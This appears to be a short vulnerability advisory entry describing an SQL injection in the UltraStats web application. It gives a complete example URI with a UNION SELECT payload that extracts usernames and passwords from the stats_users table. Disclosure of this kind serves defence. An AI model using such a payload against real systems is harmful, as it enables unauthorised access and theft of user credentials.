• info
• discussion
• exploit
• solution
• references

UltraStats 'login.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--